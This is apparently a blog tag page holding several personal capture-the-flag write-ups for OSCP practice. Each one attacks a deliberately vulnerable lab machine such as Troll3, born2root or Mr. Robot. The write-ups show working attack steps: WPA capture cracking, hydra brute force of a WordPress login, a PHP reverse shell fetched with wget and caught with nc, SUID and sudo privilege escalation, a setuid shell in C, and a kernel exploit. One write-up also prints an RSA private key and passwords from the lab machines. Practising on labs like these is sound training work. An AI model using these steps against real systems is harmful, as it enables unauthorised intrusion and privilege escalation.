Tag: oscp

Let’s take down victim01
Overview:
```
Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20
```
Mission:
```
To gain access to root and read the flag file Flag.txt.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- -o nmap.log 192.168.56.38
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

8080/tcp open http BusyBox httpd 1.13

8999/tcp open http WebFS httpd 1.21

9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
```
http://192.168.56.38:8999
```
Let’s download WPA-01.cap

Let’s run the packet in wireshark
```
wireshark WPA-01.cap &
```
I tried my best to dive into the cap file, I was not able to get any anything concrete. Based on our previous machine that we did, I am having a hunch that we will get a username and a password out of this.

Although it shows many connected devices to the router (dlink), only dlink did work as a username. You might be wondering how I got the password? You might know if you have read this post.

Yeah I did run aircrack-ng on the CAP file with rockyou file.
```
aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt
```
Yes, the password is p4ssword
```
ssh dlink@192.168.56.38        password: p4ssword
```
I made it a habit that as soon as I get a limited (or user shell), I do manually check all the low hanging fruits.

Such as

sudo -l

cat ~/.viminfo

crontab -l

history

find / -perm -u=s -type f 2>/dev/null

find / -perm 0777 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

to name a few. If I don’t find anything then I use linpeas.sh and other scripts, by uploading those to /tmp folder of that limited user account.

We found something interesting.
```
https://gtfobins.github.io/gtfobins/nohup/
```
Note: kindly bookmark this website site. https://gtfobins.github.io/
```
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
```
yeah, we got the flag..

Method 2:

To check writeable directory
```
find / -writable -type d 2>/dev/null 
```
```
/var/www/bolt/public/files  it has the 777 permissions
```
If you have carefully read the output from nmap, you might have seen that the server is running PHP cli server. That means we can upload a php reverse shell.

Let’s do that..

On Kali Machine

I have downloaded and stored my shells and other tools at /opt

python -m SimpleHTTPServer 8000

On Victim01 Machine

cd /var/www/bolt/public/files/

wget 192.168.56.33:8000/php-reverse-shell.php

chmod +x php-reverse-shell.php

And also change the IP address and Port of your choice. Mine IP: 192.168.56.33 Port:1234

Let’s set up an nc setup on Kali Machine to receive a reverse connection from the Victim01 machine.

I tried to execute the PHP shell on the victim machine to get the reverse connection and I get a limited shell. However, when I try to view the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know what is the primary reason behind it and I think I will need to explore more on this. However, I am gonna keep this in mind while I do shelling other boxes in the future.

yes, another way to get root!

That’s all guys 🙂
July 21, 2020
Writeup for Troll3 machine
Overview:
```
Pumpkin Raising Machine IP Address: 192.168.56.26
My Machine IP Address: 192.168.56.1
```
Mission:
```
To gain access to root and read the flag file Flag.txt.
```
To know the IP address of the Target Machine:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Scanning the Network

nmap -sC -sV -p- 192.168.56.26 -o nmap.log
- sC default nmap script
- sV reveal what services are running on the target machine with respective version numbers
  -p- it means scan all the ports (65535)
  -o ouput save to nmap.log
When I look at the vm, I can see that there is start:here. I tried ssh with start as username and here as the password

Since the user “start” not a sudo user therefore, I was not able to know what sudo command it could run.

However, there were two folders.
- bluepill
  - awesome_work
- redpill
  - this_will_surely_work
Both awesome_work and this_will_surely_work are ASCII text file.

bluepill has a shorten link, I am afraid it might automatically do some drive-by attack at hind, so let’s do a virustotal scan.

Virustotal report didn’t show any threat. (nevertheless, some good cryptor could bypass such scan and let’s not discuss it here)

Now, let’s unshorten the link. There are many free services available online and you can choose based on your preference.

Ok, it’s just a rabbit hole.

cat redpill/this_will_surely_work

Another rabbit hole : (

Let’s enumerate the target machine, whether it has only binary or file which has enabled SUID or SGID.

find / -perm 0777 -type f 2>/dev/null

Since, I am using uBuntu Desktop, I need to install openssh-server package to receive binaries from the target machine.
```
sudo apt install openssh-server -y

sudo systemctl start ssh

scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2
```
Narration: I am trying to transfer wytshadow.pcap file from the victim machine to my local machine at /home/researcher/vulhub/Troll3/2

Transfer the gold_star.txt (looks like it is list of password dictionary)

We can analyze the wytshadow.cap with Wireshark (GUI) software. However, we will try to analyze it with tcpdump (Terminal) software.

tcpdump pending

By the look of it, I am going to guess wytshadow as username and password are in the .cap file.

We can crack the password using aircrack-ng package with password dictionary list which we got from the victim machine – gold_star.txt .

aircrack-ng -w gold_star.txt wytshadow.cap

gaUoCe34t1

ssh wytshadow@192.168.56.26

password: gaUoCe34t1
```
./oohfun

control+c to stop the execution
```
I checked crontab and no entry was there.

let’s figure out whether any sudo enabled binary is there.
```
password: gaUoCe34t1
```
Yes, we got something

Let’s checkout nginx configuration file, enumerate on which port it is listening. You might think why I am all of sudden taking interest in the config file. It’s because sudo is enabled on nginx. Therefore, I am trying to find some information which could be leveraged.

cat /etc/nginx/sites-enabled/default

You can see that there is a service Lynx is going to run on port 8080, if nginx runs.

Let’s verify whether is there any process running with port 8080.

netstat -ntap

Actually, this is a redundant task because we know that from the nmap.log result, we can conclude that no service is running on port 8080.

Anyway, let’s start the nginx service and, I need to google and get to know little bit about Lynx service
```
/usr/sbin/service nginx start
```
now, Lynx is listening at port 8080.

I understood now the usage of Lynx. It is more like a browser for the command line. You can read more from here.

For our purpose, what we can do is
```
lynx http://192.168.56.26:8080
```
genphlux:HF9nd0cR!
```
ssh genphlux@192.168.56.26
```
password: HF9nd0cR!

ls

cat maleus

copied the content of the maleus to key
```
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----
```
```
chmod 400 key
```
In my opinion, there might be username maleus and ssh key is the above key. Shall we try that ?
```
ssh maleus@192.168.56.26 -i key
```
indeed, it did work!

ls

dont_even_bother

file dont_even_bother

We understood it is an ELF 64-bit LSB executable.

Let’s execute it. (This approach is risk and provided you are a malware analyst, don’t execute anything on your host machine but virtual machine).

./dont_even_bother

It is expecting a password and I did try things which I could think of. No luck 🙁

Let me run a strings command

strings dont_even_bother | less

We got something interesting
screenshot
xl8Fpx%6

just a rabbit hole

cat /etc/os-release
```
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic 
```
I am a little desperate here because I was not able to find anything useful. I checked the kernel version, OS release, crontab entries, history, etc..

When I tried
cat .viminfo | less
guess what I got ?

password: B^slc8I$ (I am not sure the use of it).

Shall we try sudo -i ?

No, it is not the password: B^slc8I$ (let’s keep with us a little while)

I tried sudo -l
password: B^slc8I$

Yeh! Finally…

We can use an exploit to escalate the privilege to root user.. because dont_even_bother is running with root privilege..

vi dont_even_bother
```
#include
#include
#include<sys/types.h>

int main()
{
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
:wq! (To get out from vim – for new users)
source code credit

To compile it
```
gcc dont_even_bother.c -o dont_even_bother
```
some gibberish error may come, don’t worry about those..

Let’s execute our code

sudo ./dont_even_bother
July 9, 2020
Will I able to pwn “Lord Of the Root” ?
Hello there,

I hope you are all safe and doing well. I am not sure whether it is a good idea however, instead of prayer all the time why not I volunteer to do the errand of old people around the place I stay, to purchase groceries and basic necessary things during the lock down period. So I am going to make few notice page and leave my contact there provided anybody require my help. Yes, my parents are in Tibet which I can’t physically help them but I do believe in karma. If I help the people in here, there will be kind and compassionate people over there who will assist my parent 🙂 (Even if it is just a fallacies, I am gonna believe it :))

OK. Today, I am going to do a very challenging box (at least to me lol). Hopefully, it won’t beat me black and blues lol

Step 01:
```
ifconfig
```
Kali Linux IP: 192.168.56.11

Step 02:

Target machine IP: 192.168.56.19

You can try any methods

(more…)
March 27, 2020
Me and My Girl Friend – This is the machine name lol
Today is 22nd March and we are having all India curfew to “stay at Home” from the COVID-19. Had a good breakfast and by the time I was washing my face, a kettle of water is already boiled. So, everything set to pwn the machine.

*********************************************************************************************

Description og the Game:

This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp“, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

Download the Machine from this link: Click Here

********************************************************************************************************************************************

Step 01:
```
sudo ifconfig
```
My Kali Linux Machine IP address is: 192.168.56.11

Step 02:
```
nmap 192.168.56.11/24 > target_ip.log 

cat target_ip.log
```
I know save this output because I get confused with different IP addresses (recently I been playing with couple of machines)

So the Target Machine IP address is: 192.168.56.17

Step 03:

Let’s find what services, service version and port numbers is currently running on it.
```
nmap -sC -sV -p- 192.168.56.17 -oN nmap.log
```
Step 04:

It is confirmed that a webserver (Apache) is running on it. Besides, result of step 03 is very important. If we can’t find anything useful, we will have to go through it again and attack another services etc.. So keep this in mind.

Let’s find files in the webserver.. Which usually you can do with nikto or gobuster. I do both.
```
nikto -h 192.168.56.17 > nikto.log
```
Visit the website and files we found through nikto scanner

1.1 Visit website.

“The site can only be accessed local” which is very important hint. (localhost or 127.0.0.1)

1.2. Source code: Ctrl+U (on firefox)

very important hint “use x-forwarded-for”

To be honest, I know it will act as redirection but I don’t know the syntax so I googled and I got this ..

So the syntax is
```
x-forwarded-for localhost
```
1.3 At this time, I just fire-up my burp suite and modified the request. (let me know if you don’t know how to use burpsuite or configure it, in the comment).

I had to manually put the custom header value there on each request (x-forward-for: localhost) However, I am very happy with the result and perhaps when time permits me today, I will read more on how to automate this, so that I won’t have to spend that much time for such task 🙂

Yes, when I see the login page I felt very excited and google few sql cheat sheet right away and start experimenting. Nevertheless, I was no luck. However, if you have read the last couple of post, I did LFI to one of the box. So, I thought why not I open an account and upload my shell in there. (usually this is done during the bug bounty too)

So I began to messing with the ID values up in the URL location. I place 1 there and checked, then 2, and then 3… I enumerate till 6 and I got all the user registered on this website with their password.

If you do remember the game description which is at the very beginning of this write up, our person of the interest is alice.

Yeah, we got the password of user alice.
```
username: alice 
password: 4lic3
```
As per the nmap result, we know that the SSH protocol is running on the box.
```
ssh alice@192.168.56.14
```
Usually, I used to think how come those blogger knows everything about the box.. Now I realized it. I tried SUID binaries and tried and ran into my rabbit holes, but I didn’t write it here lol

While I was solving the previous box, the author trolled me to wait for password (although there isn’t one) and the user itself is sudo user so no complex exploit is required to root that. Therefore, in this box, I would like to test whether the current user has sudo on it. So I googled the syntax and guess what I got?
```
Yes, /usr/bin/php has root privilege enabled on it.
```
I know through python, we can escalate the privilege by writing three lines of code (to set value for setuid, setgid). However, I have no idea with PHP. So I googled a little and thought it will be faster to ask some pointer from OSCP STUDY GROUP.

Indeed I got help and I was able to root it within few seconds. (using this link)

So I will not write details of it, because everything is there in that link. Probably you should read a little too 🙂

As per the requirement, we need to get two flags and root the system.

So far we root the system and got one flag.

However, another one I am not sure where it is. Let’s use the power of find command lol

find / -name gfriEND*

No, I didn’t find anything. Let’s enumerate again carefully this time…

Yes, indeed.. it is here… fishhhhhhh lol

Flag 01 is here:

Final Assign and message which Bob wish to know is here.

Going to prepare lunch now.. Hopefully I could take down another box today 🙂
March 22, 2020
owing born2root
Hello and Tashi Delek everyone,

Although there isn’t many COVID19 cases around the place I stay, the ominous air of uncertainty and concern from the people getting increases. By the way, I reached Dharamsala yesterday and, as soon as I got in room, I did wash all the clothes I wear during the journey (I took a flight and a bus to reach here), and apart from few electronic gadgets, literally I washed everything and had loaded my kitchen with rations (this is my ritualistic habit whenever I get back to room, not because of the current situation though) and other amenities.

After a sumptuous meal, I retired early yesterday.

Anyway, I woke up around 5 o’clock today and feeling fresh and rejuvenated. Nevertheless, I had to wait till April to renew my internet connection.

I thought why not I play this “born2root” to kill some time, because I find it abnormally quiet here (because at Bangalore, I stay at my friend’s place and usually commotion of college students push life in the atmosphere there). Am I missing the place?!

Let’s see whether we can break this machine or not 🙂
```
Step 01: ifconfig 

Kali Machine IP: 192.168.56.11

Step 02: nmap  192.168.56.11/24 > target_ip.log 

Target Machine IP: 192.168.56.14

Step 03: Information Gathering 

nmap -sC -sV -p- 192.168.56.14 -oN nmap.log
```
From the output, I can deduce that it runs SSH, Apache webserver and rpcbind. Let’s check the low hanging first. The web part.

It has a website on it, it reveals lot of information. I am not sure why, but I feel like taking the website content (including keywords and usernames) to make a list, perhaps I could use it as dictionary later on.
```
http://192.168.56.14
```
Then I visit robots.txt and I didn’t get potential information. I did run exiftool on the image though..

I ran nikto to enumerate and usually if I don’t find any, I use gobuster.
```
nikto -h 192.168.56.14 > nikto.log
```
Indeed, it shown couple of interesting information however, much of those yield no important information apart from one file.

I visited the first two text files, I got this key.

I didn’t check further because I got this key. However, if it is real application, I would definitely download the entire pictures and analyze each one though.

Remember, we got couple of good username from the above steps. So, first is martin, I tried to login with this username.
```
ssh -i id_rsa martin@192.168.56.14
```
Oh my god, I used a good amount of time, simple to know the password for it. It really got me.. IT”S A TROLL AND YOU JUST NEED TO PRESS ENTER!

And then, I reached to a state that I couldn’t find anything.. Here is the proof that what I was doing..

At this moment, I really learned a new tip, that is if you want to check whether any cron job is set or not, don’t just depend on crontab -l

But check,
```
cat /etc/crontab          to know the full entry of cron. I learned this from other blog
```
yes, from above write we can see that there is a cronjob entry for user jimmy which runs at every 5 minutes. Therefore, I copied a python reverse shell command from pentest monkey.And waiting for the reverse connection. So finger cross 🙂

By the way, if you are not getting reverse connection, try to polish the script you copy from the pentest money and make it more like native python program (like how we used to write normally with shbank). By the way, don’t try to execute the python program, you can get the reverse shell connection with martin user again. So patiently wait for five minutes or go and fill up your tea cup 🙂

yes, I got the reverse connection of user jimmy.

Then, I try to switch user to jimmy and martin and it was not successful. I reached my wits end. Had a delicious mushroom noodle with broth made of vegetables. (Yeah, I am veggie lol). Then had brushed my teeth and literally if I can pwn this box, I am sure I will have a great sleep 😉

I googled and came to know of a beautiful tool called cewl. I try with hydra and it was not successful. Then, I read this writeup. The author tried a tool called cupp to generate dictionary and it was beautiful. Nevertheless, I was not able to crack with hydra. I read the writeup again and check it again and it seems the password of user hadi is hadi123. I was little baffled why the wordlist generator eliminate such obvious password. Anyway, I add it manually to my dictionary and it helped me confirm that it was not hydra’s fault. Cheers buddy lol

And I got login [You can click on the image to see the command]

Finally, here is the flag 🙂
March 19, 2020
Rooting Mr. Robot
Task Goal:

1. To get root access to the machine

2. Acquire three keys:
1. 1. Key 1: 073403c8a58a1f80d943455fb30724b9
    
    Key 2: 822c73956184f694993bede3eb39f959
    
    Key 3: 04787ddef27c3dee1ee161b21670b4e4
Resource Materials:
Download Mr. Robot Machine from Here.
Download Kali Linux Machine from Here.

Information Gathering:

Step 01: ifconfig
Kali Linux Machine IP: 192.168.56.4

Step 02: nmap 192.168.56.4/24
Mr. Robot or Target Machine IP: 192.168.56.3

Step 03: Get the details of ports and services running on Target Machine

nmap -sC -sV -p- 192.168.56.3 > vulhub/mrrobot/nmap.log

It’s clearly showing that there is a web server running on port 80 and 443. Let me visit those.

Yes, I checked the details of the front-end, didn’t find anything of use. Then, I checked the source code.

Nothing special either.

I read couple of write-ups in the past and those help me to have a methodology of myself. Usually, at this time, usually I check for availability of robots.txt and if I don’t find any, then I run nikto and gobuster.

Luckily I found something through robots.txt

I want to download those files.. By the way, by the look of it, I can deduce one thing that, I need to get three keys and out of those three, here is the first one 🙂 Yippee!

Step 04: Download all the materials
```
wget 192.168.56.3/fsocity.dic

wget 192.168.56.3/key-1-of-3.txt

cat key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9
```
To be honest, my happiness did short live.. after the first key, I am reached at my wits end. Therefore, usually at such period, I look carefully to the things I found and if I didn’t find anything substantial, I do enumerate again..

I have two ideas in my mind.. one is to play around with the word list
```
 fsocity.dic
```
We will launch a brute force attack on wp-login.php page.

Another one is to perform nikto and gobuster. To save time, I am going to do everything simultaneously…

Luckily I performed sort, else it will definitely going to take a huge amount of time. (because I found many duplicate datas in the dictionary file which I downloaded from the target website)

By the way, I have saved a script to perform wp-login.php bruteforce attack sometime back and I am glad that I can use it here 🙂 (By the way, you don’t have to worry about this script, if you which to learn about this, you can easily fire your burp suite and you will get the main logic and, man hyra will help you to frame the argument).

Step 05:

1. Brute Force wp-login.php

a) We don’t know the username. So first we will do the username brute force.
```
hydra -vV -L fsociety.dic -p test 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```
b) Username: is elliot
Now, we need to bruteforce password. To get password, here is it..
```
hydra -vV -l elliot -P fsociety.dic 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```
And password is : ER28-0652

At the background, I would like to run the following two tasks (because I want to dig little more)

2. Run nikto
```
nikto -h 192.168.56.3 > nikto-192.168.56.3.log
```
3. Run gobuster
```
gobuster dir -u http://192.168.56.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
Step 05: Took huge amount of time (because of Brute Force)

Anyway, I logged into the website, and luckily “Editor” function is not disabled, that means I can inject my own code in there. I am going to plant a php reverse shell there in 404.php page. Because not many developer or people care for this page.

pentest-monkey has great list of scripts. you can download the php reverse shell from here.

I did copy the shell and paste it in 404.php

By the way, you need to change the IP address and port number which mentioned the the php reverse shell. Port number can be anything of your choice and my favorite is 9000. well the IP address of my Kali Linux Machine is 192.168.56.5 (I reset my machine, you won’t face any problem)

My Kali Linux (or Attacker) machine is waiting the reverse connection
```
nc -lvp 9000
```
Now, all I need to do is to visit the 404.php. It indeed thrown reverse connection just by visiting http://192.168.56.5/404.php

I found the flag2 and a credential file. However, due to privilege restriction, I am not able to access it.

To be honest, at this moment, I have left with no choice but to enumerate whether there are any SUID enabled binaries on the server; to escalate my current privilege … let’s try.. (If you need to know more about SUID binary finding, visit this link)
```
find / -perm -u=s -type f 2>/dev/null 

/usr/local/bin/nmap --interactive 

!sh 

cat home/robot/key-2-of-3.txt 
822c73956184f694993bede3eb39f959  [our second flag]

cat home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```
Privilege escalation using nmap resource is here.

I tried john to crack the hash, and vm crashed for several times.. so I decided to move forward. (Later I was able to crack the hash using https://crackstation.net)

Again bumped to the wall so …what we need to do is enumerate more..

I read a many articles on eternal-blue and dirty cow, because many of the people recommend to try those (kernel) exploit if you don’t have any option left. At that moment, I thought it is my time to check for kernel exploit. Therefore, I checked the kernel version, and it is indeed vulnerable to an exploit.

kernel version of the Target machine:
```
uname -r
```
The kernel version is 3.13.0-55-generic, which is vulnerable to this exploit.

I did compiled the exploit on the victim machine and executed the exploit on victim machine and yeah.. Got the root as well as the third or the final flag..
```
gcc exploit.c -o exploit 
./exploit 
id 
cat /home/root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```
Voila!! Finally…

Although I have popped this machine earlier using msfconsole, but this time, I did it entirely manually and it’s truly more satisfying and learned many more cool things!!
March 10, 2020
WinterMute Straylight Beta Writeup

Tashi Delek to you !!

These days I am in Bangalore and during my spare time I read many Reviews and Personal Stories of the people who appeared OSCP exam. And every people has different level of experiences with the course and the exam. I am not sure why but I like the write-ups of those people who appeared the exam more than once. Probably, cause I can connect with them more as I am also a newbie..

Anyway, instead of living in fear and doing nothing, I am going to practice at least 20 boxes before actually taking the course, that way, I might probably be in better position to clear that exam!

Ok enough said, let’s dive in 😉

(more…)

April 23, 2019
Brainpan 1 – A Walkthrough

Hello and Tashi Delek!

I had an opportunity to smash stack sometime back like probably 5 years ago. And it won’t be a lie to say that my skill in this area got mummified by me though unintentionally. I felt it is high time for me to undust the skill which I already have even if the haste of life is not allowing me to pickup new skills..(feeling kind of wise, is it cause I am getting older? lol)

Recently I got few projects and it appears to me that the income of it may allow me to have two or three months at ease therefore, I am going to takeup one of my dream course i.e. PWK (Penetration Testing with Kali Linux) by Offsec.

I must admit that I am frugal when it comes to buy cloths or any fancy stuffs.. but I spend rather lavishly when it comes to food(I am a veg and left drinking sometime back) and education.

(more…)

April 19, 2019